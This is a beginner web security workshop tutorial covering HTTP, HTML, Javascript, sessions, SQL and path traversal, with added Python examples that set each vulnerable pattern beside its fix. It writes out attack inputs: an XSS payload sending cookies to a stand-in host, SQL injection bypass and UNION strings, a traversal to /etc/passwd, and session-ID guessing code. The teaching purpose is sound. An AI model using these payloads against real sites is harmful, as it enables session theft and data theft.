Web techniques

Web applications often have three parts: a web server that talks HTTP, the web application code that runs on that server, and a data store (database or file system) behind it.

Web server

A web server serves documents to web browsers via HTTP, which is a network protocol.

A protocol is an agreed-upon way of talking between computers.

HTTP

HTTP uses URLs to find web pages. These are what you see in the address bar near the top of a web browser.

https://hackintheclass.nl/index.php?show=Workshops&page=1

    https                              Protocol
    hackintheclass.nl                  Host name or server address (HTTP_HOST)
    /index.php                         Path to the document (SCRIPT_NAME)
    show                               Variable
    Workshops                          Value of 'show' variable
    page                               Variable
    1                                  Value of 'page' variable
    show=Workshops&page=1              Query (QUERY_STRING)
    /index.php?show=Workshops&page=1   Request (REQUEST_URI)

Path to the document

For a path of /admin/news/index.php, the web server walks the file system tree below its document root:
first it finds admin in / (the document root), then it finds news in admin/, then it finds index.php in news/.

What happens when...

Visiting web page https://bitlair.nl/Workshops:

HTTP GET request

GET forms put their data in the URL. It is visible in the address bar, stored in the browser history, can be bookmarked, and also ends up in the web server's access log and in the Referer header sent along to the next page. That makes GET a bad choice for a login form:
GET /logon.php?username=hax0r&password=supersecret123 HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96

>-- end of request --<
            
Address bar with GET request
It helps to use the developer tools (press F12) - network tab to look at the network traffic.

HTTP POST request

POST forms put their data in the request body, so it does not show up in the address bar, the history or bookmarks. It is still plain text on the wire: anyone who can read the traffic (or who opens the developer tools) sees it, so POST is not a substitute for HTTPS.
POST /logon.php HTTP/1.1
Host: bitlair.nl
Cookie: PHPSESSID=f1a1d9715b3491bbc2d5203c88ac67fb
Referer: https://bitlair.nl/index.php?action=showloginform
User-Agent: Mozilla/5.0 >--snip--< Chrome/69.0.4453.96
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=hax0r&password=supersecret123
>-- end of request --<
            

More information about HTTP

If you want to know more about web servers and the HTTP protocol, go to

HTTP: common mistakes

Mistake: Not using encryption
Websites should always use HTTPS (HTTP over TLS, the encrypted form of HTTP). When they don't use encryption, anyone on the network path can read the traffic, including the username and password in the requests above, and can change the pages on their way to the browser.
Mistake: Information disclosure
Version numbers, directory indexes, backup files and exposed version-control directories (.svn, .git) tell an attacker exactly what is running and may hand over the source code.

Play HTTP challenges

The challenges get more difficult as you reach higher levels. Look for version numbers, directory indexes, backup files, Subversion work trees and Git work trees. If you get stuck, no problem, just continue the tutorial and come back here later.

HTML

The structure and content of every web page is described in HTML; its appearance is usually styled with CSS and its behaviour scripted in Javascript.

Go to a random web page, right click on a background area, then click on "View page source".
View source right mouse click
Also available by pressing and holding Ctrl then pressing U (Ctrl-U)

Basic HTML

HyperText Markup Language: markup with tags: <open tag>content</close tag>
    <!doctype html>
    <html>
    <head>
      <title>Example HTML website</title>
    </head>
    <body>
      <h1>Top level header</h1>
      <ul>
        <li><a href="http://www.google.nl">Google</a></li>
        <li><a href="https://bitlair.nl">Bitlair</a></li>
      </ul>
    </body>
    </html>
HTML tutorial at w3schools

HTML Forms

    <form method="POST">
      <table>
        <tr>
          <td>Username:</td>
          <td><input type="text" name="username"></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input type="password" name="password"></td>
        </tr>
      </table>
      <input type="submit" value="Log me in">
    </form>
            
Try changing the method from POST to GET on the Play around with HTML forms slide, then submit and see what happens
HTML forms tutorial at w3schools

More information about HTML

If you want to know more about HTML, go to

Play around with HTML forms

(Interactive slide: an editable copy of the HTML form above, with the HTTP request it produces shown next to it.)

HTML: Common mistakes

Mistake: Information leaking
Everything in the HTML source is public: comments, hidden form fields, paths to internal scripts and developer notes are all readable with View page source.
Mistake: Not encoding user content
Text that comes from a user (a name, a comment, a search term) must be HTML-encoded before it is put into a page: < becomes &lt;, > becomes &gt;, & becomes &amp;, and quotes become &quot; and &#x27;. Otherwise the user can put tags into the page, including <script>, and every visitor's browser runs them.
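The encoding mistake and its fix, as an added example that is not part of the workshop (it also covers the "Not encoding input, allowing JS" item in the Javascript mistakes later on). The comment field, the page fragment and the attacker payloads are constructed for this example; html.escape is Python's standard-library encoder.

```python
# Added example (not from the workshop): putting user text into HTML without
# and with encoding. Text and attribute context are both shown, because an
# unquoted or unencoded attribute value is just as exploitable as page text.
import html


def render_unsafe(comment):
    """The mistake: the user's text is pasted straight into the page."""
    return f"<p>Comment: {comment}</p>"


def render_safe(comment):
    """Encode the five characters that mean something in HTML: < > & \" '."""
    return f"<p>Comment: {html.escape(comment, quote=True)}</p>"


def render_attribute_unsafe(value):
    """Attribute version of the mistake: a quote in the value closes the
    attribute and whatever follows becomes new attributes or tags."""
    return f'<input type="text" name="comment" value="{value}">'


def render_attribute_safe(value):
    """Attribute values need the same encoding (quotes included) and must be
    placed inside quotes."""
    return f'<input type="text" name="comment" value="{html.escape(value, quote=True)}">'


# Constructed attacker inputs, in the style of the Javascript injection challenge.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '"><img src=x onerror="alert(1)'

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))             # browser runs the script
    print(render_safe(PAYLOAD))               # browser shows the text "<script>..."
    print(render_attribute_unsafe(ATTR_PAYLOAD))
    print(render_attribute_safe(ATTR_PAYLOAD))
```

In the safe output the payload is still there, byte for byte recoverable, but the browser renders it as text instead of parsing it as a tag: encoding changes nothing about what the user said, only about what the browser does with it.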

Play HTML challenges

Challenge: include an image in a website.

Javascript

Javascript is a programming language that runs in the web browser, so everything it does happens on the visitor's computer.

Javascript: example

This script finds the username and password HTML inputs and makes them available in the variables usernameInput and passwordInput.
It then checks whether what the user typed in the username field is the same as in the password field.
    <input type="text" id="username">
    <input type="password" id="password">
    <script type="text/javascript">
        // Finds the username HTML input field above and puts it in variable usernameInput
        var usernameInput = document.getElementById("username");
        // Same for the password input field
        var passwordInput = document.getElementById("password");

        // Compare what the user entered in username to the password input.
        if (usernameInput.value == passwordInput.value) {
            // Username and password are the same.
            ...
        }
    </script>
            

More information about Javascript.

If you want to know more about Javascript, go to

Javascript: Common mistakes

Because Javascript runs on the client, clients can bypass or manipulate it. As a result, these mistakes are common:
Mistake: Not checking input
Javascript runs on the client. Validating user input like form fields in Javascript is a convenience for the user, not protection for the server: an attacker simply sends the request without the page (see the HTTP requests above). All input always has to be checked on the server.
Mistake: Checking the password in JS
Javascript runs on the client. Any check can be read (View page source) and bypassed. This includes password checks, but also permission checks (authentication and authorisation). Those checks belong on the server.
Mistake: Not encoding input, allowing JS
This is actually an HTML mistake: Not encoding user content. User text that ends up in the page unencoded can carry a <script> tag, which then runs with the rights of the site in every visitor's browser (Cross Site Scripting).
Mistake: Including JS from other sites
Including Javascript from a server managed by somebody else (like googleapis.com, jquery.org, github.io) is not good practice: whoever controls or compromises that server can run code in your page. If you must include an external script, pin it with the integrity attribute (Subresource Integrity) so the browser refuses a changed copy.
Mistake: Not restricting JS in frames
Using frames with external content (like advertisements) without restricting what the framed page may do (the iframe sandbox attribute) opens the website up to hijacking. The other direction matters too: a page that lets itself be framed by other sites can be clickjacked unless it sends a Content-Security-Policy frame-ancestors header (or X-Frame-Options).

Play Javascript challenges

Inject javascript into a website.

Play Basic Web challenges

You can now do challenges:

Web application

Javascript runs program code in the web browser. The web server can run program code as well; that server-side code is the web application.

Sessions

HTTP itself does not remember anything between requests. To recognise a logged-in browser on later requests, the server hands out a session ID in a cookie (PHPSESSID in the requests above) and looks it up on every request to find the user it belongs to.

Session mistakes

Mistake: Predictable session ID
If the session cookie for user ID 1 is always something like sha1(user1) or md5(1), or sessions are handed out in sequence like sessionid=10, sessionid=11, it is considered predictable: an attacker can compute or count to the admin's session ID without ever knowing the password. Session IDs must come from a cryptographically secure random generator with enough entropy (at least 128 bits) and carry no information about the user.
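The three predictable schemes named above, an attacker computing the admin's cookie from them, and the random replacement, as an added example that is not the workshop's code. The session store and the user IDs 1 and 2 (synnack and admin from the users table later on) are constructed for this example.

```python
# Added example (not from the workshop): predictable session IDs versus
# random ones, with the attacker's side shown as well.
import hashlib
import secrets


def predictable_session_id(user_id, scheme):
    """The mistake: a session ID derived only from things the attacker knows."""
    if scheme == "sha1_user":
        return hashlib.sha1(f"user{user_id}".encode()).hexdigest()
    if scheme == "md5_id":
        return hashlib.md5(str(user_id).encode()).hexdigest()
    if scheme == "counter":
        return str(user_id)
    raise ValueError(f"unknown scheme {scheme}")


def new_session_id(nbytes=16):
    """The fix: 16 bytes (128 bits) from the OS CSPRNG, unrelated to the user.
    The server keeps the mapping session ID -> user; the cookie itself says
    nothing about who the user is."""
    return secrets.token_hex(nbytes)


def entropy_bits(hex_session_id):
    """Upper bound on the randomness a hex session ID can carry: 4 bits per digit."""
    return 4 * len(hex_session_id)


def login_all(scheme, user_ids=(1, 2)):
    """Constructed server-side session store: every user logged in once under
    the given scheme, mapping session ID -> user ID."""
    if scheme == "random":
        return {new_session_id(): uid for uid in user_ids}
    return {predictable_session_id(uid, scheme): uid for uid in user_ids}


def hijack(store, target_user_id, guessed_scheme):
    """What an attacker does: compute the cookie the target would have under
    the guessed scheme and present it. Returns the user ID the server now
    believes the attacker is, or None when the guess is not a live session."""
    candidate = predictable_session_id(target_user_id, guessed_scheme)
    return store.get(candidate)


if __name__ == "__main__":
    for scheme in ("sha1_user", "md5_id", "counter"):
        print(scheme, "->", hijack(login_all(scheme), 2, scheme))   # 2: attacker is admin
    print("random ->", hijack(login_all("random"), 2, "md5_id"))    # None
    print(new_session_id(), entropy_bits(new_session_id()), "bits")
```

With the random store the attacker has nothing to compute from: a 128-bit ID takes on average 2**127 guesses, and each guess costs a request the server can rate-limit and log.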

Play session challenges

Get the admin cookie with Cross Site Scripting, log in with the admin cookie:

PHP

PHP is a programming language for building up HTML web pages on the server. Other programming languages can be run on the server as well, like Python, Java, ASP.NET and even Javascript (Node.js).

Web application: Common mistakes

Mistake: Having default passwords

A lot of applications and devices come with default passwords. This is not smart: the defaults are in the manual and in public lists. It is better to require the user to set a password on first use.

Mistake: Allowing weak / leaked passwords

Mistake: Not limiting login attempts

Our lab will not have brute force challenges, but will have challenges that involve the most common default usernames/passwords

Mistake: Trusting the browser with secrets

Some web applications don't use sessions but store the username and password in cookies. Anything the browser holds can be read and changed by the user, so a cookie must never be trusted as proof of who the user is; only a server-side lookup of a random session ID is.

Mistake: Predictable interactions

Mistake: Not updating components

Mistake: poor permission checks

Play web application challenges

Try to make the guest user become admin, using Cross Site Request Forgery.

Data

Data is stored:

Database

A data store that serves data to other applications. There are many types, but the most common are:

Data retrieval

Most web applications use SQL databases for data storage

SQL comments - MySQL

            SELECT password     # Password field
            FROM users          # Users table
            WHERE id=1 OR id=2  # User ID 1 or 2
            ORDER BY id ASC     # Sort by id, ascending
            LIMIT 2             # Show only two records
            ;                   # End of query

MySQL also accepts "-- " (two dashes followed by a space) and /* ... */ as comments. The "-- " form is the one usually used to cut off the rest of a query, because most other databases understand it too.

SQL data is stored in tables

Table "users":

    userid   username   password          email
    1        synnack    Supersecret123!   synnack@example.com
    2        admin      Adm1ns3cr3t!      admin@example.com

* Note: It is bad to store plaintext passwords as in this table. Store the output of a password-based key derivation function like PBKDF2 or bcrypt, with a random salt per user, and compare against that at login.
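The note above put into practice, as an added example that is not the workshop's code: the two accounts from the users table stored as PBKDF2-SHA256 hashes with a per-user salt, and a login check against them. The storage format, iteration count and the dummy-hash trick are this example's choices; hashlib.pbkdf2_hmac and hmac.compare_digest are standard library.

```python
# Added example (not from the workshop): password storage with PBKDF2 instead
# of plaintext. Every function here is the server side; the browser never sees
# the salt or the hash.
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000          # slow on purpose: each guess costs the attacker this much work


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return 'pbkdf2_sha256$iterations$salt$hash', all that goes in the users table."""
    if salt is None:
        salt = os.urandom(16)   # unique per user: the same password hashes differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        "pbkdf2_sha256",
        str(iterations),
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    ])


def verify_password(password, stored):
    """Recompute with the stored salt and iterations; compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


# Constructed users table: the two accounts from the slide, now hashed.
USERS = {
    "synnack": hash_password("Supersecret123!"),
    "admin": hash_password("Adm1ns3cr3t!"),
}

# Hash verified for unknown usernames, so a failed login takes the same time
# whether or not the username exists (no username enumeration by timing).
DUMMY = hash_password("", b"\x00" * 16)


def login(username, password):
    stored = USERS.get(username, DUMMY)
    ok = verify_password(password, stored)
    return ok and username in USERS


if __name__ == "__main__":
    print(USERS["admin"])
    print(login("admin", "Adm1ns3cr3t!"), login("admin", "wrong"), login("nobody", ""))
```

Because the salt is random, the two stored strings differ even when two users pick the same password, and an attacker who dumps the table (for example through the SQL injection below) still has to brute-force each hash separately at 600,000 SHA-256 rounds per guess.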

Play around with SQL

SQL: Common mistakes

SQL databases have several potential vulnerabilities:
Enumeration
If data is accessed like /page.php?id=1, can we also get page 2, 3, 4 and 5? When the server only checks that the id exists, and not whether this user is allowed to see it, unpublished or other users' records leak (a missing authorisation check):

    id   page
    1    AMERSFOORT   Today we witnessed a...
    2    AMSTERDAM    It was an historic event...
    3    Unpublished - Top secret files leaked...

SQL injection
Try SQL injection
Common patterns (do try them at Play around with SQL): closing the string with a quote and commenting out the rest of the query, an OR condition that is always true, and UNION SELECT to pull rows from another table into the result. Study the Pentestmonkey cheatsheet for inspiration on what to type behind UNION SELECT, like finding table names and field names in a certain table.
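The patterns above, as an added example that is not the workshop's code: the users and news tables from the slides rebuilt in an in-memory SQLite database, a login and a page lookup written the vulnerable way (string formatting) and the safe way (placeholders), and the attacker inputs run against both. The news table contents and the function names are constructed for this example. SQLite only understands the "-- " comment, which MySQL accepts too; the "#" comment from the MySQL slide would not work here.

```python
# Added example (not from the workshop): SQL injection against a formatted
# query, beside the parameterised query that is immune to the same input.
import sqlite3


def make_db():
    """Constructed database with the tables from the slides."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(userid INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'synnack', 'Supersecret123!', 'synnack@example.com');
        INSERT INTO users VALUES (2, 'admin', 'Adm1ns3cr3t!', 'admin@example.com');
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'AMERSFOORT', 'Today we witnessed a...');
        INSERT INTO news VALUES (2, 'AMSTERDAM', 'It was an historic event...');
    """)
    return db


def login_vulnerable(db, username, password):
    """The mistake: user input pasted into the SQL text, so quotes in the
    input become part of the query."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """The fix: placeholders. The driver sends the values separately from the
    query text, so a quote in the input is just a quote."""
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def news_vulnerable(db, page_id):
    """page.php?id=... built by string formatting: no quotes around the number,
    so no quote is even needed to inject."""
    return db.execute(f"SELECT title, body FROM news WHERE id={page_id}").fetchall()


def news_safe(db, page_id):
    """Placeholder plus a type check: an id that is not a number is rejected."""
    try:
        page_id = int(page_id)
    except ValueError:
        return []
    return db.execute("SELECT title, body FROM news WHERE id=?", (page_id,)).fetchall()


# Constructed attacker inputs, in the style of the Pentestmonkey cheatsheet.
BYPASS = "admin'-- "                                   # comment out the password check
OR_TRUE = "' OR '1'='1"                               # condition that is always true
UNION = "0 UNION SELECT username, password FROM users"  # other table via the news page

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login as:", login_vulnerable(db, BYPASS, "anything"))   # admin
    print("safe login as:", login_safe(db, BYPASS, "anything"))               # None
    print("vulnerable news:", news_vulnerable(db, UNION))                     # users rows
    print("safe news:", news_safe(db, UNION))                                 # []
```

Print the SQL string from login_vulnerable with BYPASS to see why it works: the query becomes SELECT username FROM users WHERE username='admin'-- ' AND password='anything', and everything after the two dashes is a comment.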

Play SQL injection challenges 1 and 2
Open the Pentestmonkey cheatsheet and The play around slide in new tabs, then open the levels in a new tab.
Play SQL injection challenges 3
For this level you will need to know about HTTP requests as well, see the web server section

File system

Files are sometimes included or served from the file system based on a name taken from the URL. Typically, this looks like ?page=home.html or download.php?file=pentest-report.pdf in the address bar.

File system inclusion: Common mistakes

Path Traversal
download.php?file=pentest-report.pdf
If the file name is joined to the downloads directory without any check, a request for download.php?file=../../../../etc/passwd climbs out of that directory with .. and reads a file the application never meant to serve.
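The download.php?file= pattern, as an added example that is not the workshop's code: the file name joined to the directory without a check, and the same lookup with a check that the resolved path is still inside the downloads directory. The directory layout (www/downloads with the report, and an etc/passwd stand-in outside it) is constructed in a temporary directory so the example runs anywhere.

```python
# Added example (not from the workshop): path traversal in a file download
# handler, and the realpath + commonpath check that stops it.
import os
import tempfile


def read_vulnerable(base_dir, filename):
    """The mistake: the user-supplied name is joined to the directory as-is.
    '..' climbs out of it, and an absolute name replaces base_dir entirely."""
    path = os.path.join(base_dir, filename)
    with open(path, "rb") as f:
        return f.read()


def safe_path(base_dir, filename):
    """Resolve the full path (following .. and symlinks) and insist it is still
    under base_dir. Returns None when it is not."""
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def read_safe(base_dir, filename):
    """The fix: refuse anything that resolves outside base_dir or is not a file."""
    path = safe_path(base_dir, filename)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as f:
        return f.read()


def make_fixture():
    """Constructed layout: <tmp>/www/downloads/pentest-report.pdf next to a
    <tmp>/etc/passwd stand-in that must never be reachable through download.php.
    Returns (root, downloads_dir)."""
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "www", "downloads")
    os.makedirs(downloads)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(downloads, "pentest-report.pdf"), "wb") as f:
        f.write(b"%PDF-1.4 report")
    with open(os.path.join(root, "etc", "passwd"), "wb") as f:
        f.write(b"root:x:0:0:root:/root:/bin/sh")
    return root, downloads


if __name__ == "__main__":
    _root, downloads = make_fixture()
    print(read_vulnerable(downloads, "../../etc/passwd"))    # the passwd stand-in
    print(read_safe(downloads, "../../etc/passwd"))          # None
    print(read_safe(downloads, "pentest-report.pdf"))        # the report
```

The check compares resolved paths rather than looking for the substring "..", because encodings, symlinks and names like "..\\" on Windows all sneak past a string filter while realpath sees where the path really ends up.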
Play path traversal challenges 1 and 2
Play path traversal challenges 3

Play combining skills challenges

Hack in the Class

Web technologies
